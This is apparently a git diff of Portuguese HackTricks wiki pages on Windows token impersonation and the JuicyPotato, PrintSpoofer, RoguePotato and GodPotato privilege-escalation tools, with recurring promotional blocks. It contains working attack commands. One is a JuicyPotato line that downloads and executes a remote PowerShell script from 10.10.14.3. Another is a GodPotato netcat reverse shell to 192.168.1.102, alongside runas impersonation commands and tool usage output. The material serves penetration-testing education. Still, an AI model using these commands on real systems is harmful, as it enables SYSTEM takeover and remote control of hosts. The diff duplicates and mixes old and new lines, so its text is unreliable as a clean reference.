Quando um administrador local faz login, **dois tokens de acesso são criados**: Um com direitos de administrador e outro com direitos normais. **Por padrão**, quando esse usuário executa um processo, o token com **direitos regulares** (não administrador) **é utilizado**. Quando esse usuário tenta **executar** algo **como administrador** ("Executar como Administrador", por exemplo), o **UAC** será usado para solicitar permissão.\
Se você quiser [**saber mais sobre o UAC, leia esta página**](../authentication-credentials-uac-and-efs/#uac)**.**
### Impersonação de usuário de credenciais
Se você tiver **credenciais válidas de qualquer outro usuário**, você pode **criar** uma **nova sessão de logon** com essas credenciais:
```
runas /user:domain\username cmd.exe
```
O **token de acesso** também possui uma **referência** das sessões de logon dentro do **LSASS**, isso é útil se o processo precisa acessar alguns objetos da rede.\
Você pode iniciar um processo que **usa credenciais diferentes para acessar serviços de rede** usando:
```
runas /user:domain\username /netonly cmd.exe
```
Isso é útil se você tiver credenciais úteis para acessar objetos na rede, mas essas credenciais não são válidas dentro do host atual, pois serão usadas apenas na rede (no host atual, os privilégios do seu usuário atual serão usados).
Este é útil se você tiver credenciais úteis para acessar objetos na rede, mas essas credenciais não são válidas dentro do host atual, pois serão usadas apenas na rede (no host atual, os privilégios do seu usuário atual serão usados).
### Tipos de tokens
Existem dois tipos de tokens disponíveis:
* **Token Primário**: Serve como uma representação das credenciais de segurança de um processo. A criação e associação de tokens primários com processos são ações que requerem privilégios elevados, enfatizando o princípio da separação de privilégios. Tipicamente, um serviço de autenticação é responsável pela criação do token, enquanto um serviço de logon lida com sua associação com o shell do sistema operacional do usuário. Vale ressaltar que os processos herdam o token primário de seu processo pai na criação.
* **Token de Impersonação**: Capacita uma aplicação de servidor a adotar temporariamente a identidade do cliente para acessar objetos seguros. Esse mecanismo é estratificado em quatro níveis de operação:
* **Anônimo**: Concede acesso ao servidor semelhante ao de um usuário não identificado.
* **Identificação**: Permite que o servidor verifique a identidade do cliente sem utilizá-la para acesso a objetos.
* **Impersonação**: Permite que o servidor opere sob a identidade do cliente.
* **Delegação**: Semelhante à Impersonação, mas inclui a capacidade de estender essa suposição de identidade a sistemas remotos com os quais o servidor interage, garantindo a preservação das credenciais.
- **Token Primário**: Serve como uma representação das credenciais de segurança de um processo. A criação e associação de tokens primários com processos são ações que requerem privilégios elevados, enfatizando o princípio da separação de privilégios. Tipicamente, um serviço de autenticação é responsável pela criação do token, enquanto um serviço de logon lida com sua associação com o shell do sistema operacional do usuário. Vale ressaltar que os processos herdam o token primário de seu processo pai na criação.
- **Token de Impersonação**: Capacita uma aplicação de servidor a adotar temporariamente a identidade do cliente para acessar objetos seguros. Esse mecanismo é estratificado em quatro níveis de operação:
- **Anônimo**: Concede acesso ao servidor semelhante ao de um usuário não identificado.
- **Identificação**: Permite que o servidor verifique a identidade do cliente sem utilizá-la para acesso a objetos.
- **Impersonação**: Permite que o servidor opere sob a identidade do cliente.
- **Delegação**: Semelhante à Impersonação, mas inclui a capacidade de estender essa suposição de identidade a sistemas remotos com os quais o servidor interage, garantindo a preservação das credenciais.
#### Impersonate Tokens
#### Impersonar Tokens
Usando o módulo _**incognito**_ do metasploit, se você tiver privilégios suficientes, pode facilmente **listar** e **impersonate** outros **tokens**. Isso pode ser útil para realizar **ações como se você fosse o outro usuário**. Você também pode **escalar privilégios** com essa técnica.
Usando o módulo _**incognito**_ do metasploit, se você tiver privilégios suficientes, pode facilmente **listar** e **impersonar** outros **tokens**. Isso pode ser útil para realizar **ações como se você fosse o outro usuário**. Você também pode **escalar privilégios** com essa técnica.
### Privilégios do Token
@ -113,14 +121,27 @@ Dê uma olhada em [**todos os possíveis privilégios do token e algumas defini
Saiba mais sobre tokens nestes tutoriais: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) e [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

52
windows-hardening/windows-local-privilege-escalation/juicypotato.md
View file

@ -2,16 +2,30 @@
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao avançado com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) podem ser usados para **alavancar os mesmos privilégios e obter acesso de nível `NT AUTHORITY\SYSTEM`**. _**Verifique:**_
{% endhint %}
@ -28,7 +42,7 @@ _Uma versão açucarada do_ [_RottenPotatoNG_](https://github.com/breenmachine/R
### Resumo <a href="#summary" id="summary"></a>
**[Do Readme do juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/README.md):**
[**Do Readme do juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) e suas [variantes](https://github.com/decoder-it/lonelypotato) alavancam a cadeia de escalada de privilégios com base no serviço [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) tendo o ouvinte MiTM em `127.0.0.1:6666` e quando você tem privilégios `SeImpersonate` ou `SeAssignPrimaryToken`. Durante uma revisão de compilação do Windows, encontramos uma configuração onde o `BITS` foi intencionalmente desativado e a porta `6666` foi usada.
@ -46,7 +60,7 @@ Após alguns testes, obtivemos e testamos uma extensa lista de [CLSID's interess
### Detalhes suculentos <a href="#juicy-details" id="juicy-details"></a>
O JuicyPotato permite que você:
JuicyPotato permite que você:
* **CLSID de Destino** _escolha qualquer CLSID que desejar._ [_Aqui_](http://ohpe.it/juicy-potato/CLSID/) _você pode encontrar a lista organizada por SO._
* **Porta de Escuta COM** _defina a porta de escuta COM que preferir (em vez do 6666 codificado por padrão)_
@ -60,6 +74,7 @@ O JuicyPotato permite que você:
* **Endereço do Servidor RPC** _para uma abordagem furtiva, você pode autenticar-se em um servidor RPC externo_
* **Porta do Servidor RPC** _útil se você deseja autenticar-se em um servidor externo e o firewall está bloqueando a porta `135`..._
* **Modo de TESTE** _principalmente para fins de teste, ou seja, testar CLSIDs. Ele cria o DCOM e imprime o usuário do token. Veja_ [_aqui para testar_](http://ohpe.it/juicy-potato/Test/)
### Utilização <a href="#usage" id="usage"></a>
```
T:\>JuicyPotato.exe
JuicyPotato v0.1
@ -76,9 +91,9 @@ Optional args:
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
```
### Pensamentos finais <a href="#final-thoughts" id="final-thoughts"></a>
### Pensamentos Finais <a href="#final-thoughts" id="final-thoughts"></a>
**[Do Readme do juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts):**
[**Do Readme do juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
Se o usuário tiver privilégios `SeImpersonate` ou `SeAssignPrimaryToken`, então você é **SYSTEM**.
@ -106,18 +121,16 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
c:\Users\Public>
```
### Powershell rev
### PowerShell reverso
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
```
### Iniciar um novo CMD (se tiver acesso RDP)
![](<../../.gitbook/assets/image (37).png>)
![](<../../.gitbook/assets/image (297).png>)
## Problemas com CLSID
Muitas vezes, o CLSID padrão que o JuicyPotato usa **não funciona** e o exploit falha. Geralmente, são necessárias várias tentativas para encontrar um **CLSID funcional**. Para obter uma lista de CLSIDs para tentar em um sistema operacional específico, você deve visitar esta página:
Muitas vezes, o CLSID padrão que o JuicyPotato usa **não funciona** e o exploit falha. Geralmente, são necessárias várias tentativas para encontrar um **CLSID funcional**. Para obter uma lista de CLSIDs para testar em um sistema operacional específico, você deve visitar esta página:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -127,21 +140,34 @@ Primeiro, você precisará de alguns executáveis além do juicypotato.exe.
Baixe [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) e carregue-o em sua sessão PS, e baixe e execute [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Esse script criará uma lista de CLSIDs possíveis para testar.
Em seguida, baixe [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(altere o caminho para a lista de CLSID e para o executável juicypotato) e execute-o. Ele começará a tentar cada CLSID e **quando o número da porta mudar, significará que o CLSID funcionou**.
Em seguida, baixe [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(altere o caminho para a lista de CLSIDs e para o executável juicypotato) e execute-o. Ele começará a tentar cada CLSID e **quando o número da porta mudar, significará que o CLSID funcionou**.
**Verifique** os CLSIDs funcionais **usando o parâmetro -c**
## Referências
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

40
windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View file

@ -10,15 +10,29 @@ Outras formas de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares roubadores**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 a partir da compilação 1809. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) podem ser usados para **alavancar os mesmos privilégios e obter acesso de nível `NT AUTHORITY\SYSTEM`**. Este [post de blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda sobre a ferramenta `PrintSpoofer`, que pode ser usada para abusar dos privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) podem ser usados para **alavancar os mesmos privilégios e obter acesso de nível `NT AUTHORITY\SYSTEM`**. Este [post de blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda a ferramenta `PrintSpoofer`, que pode ser usada para abusar dos privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
{% endhint %}
## Demonstração Rápida
## Quick Demo
### PrintSpoofer
```bash
@ -65,6 +79,8 @@ C:\temp>type C:\temp\w.log
nt authority\system
```
### GodPotato
### BatataDivina
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
@ -76,16 +92,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>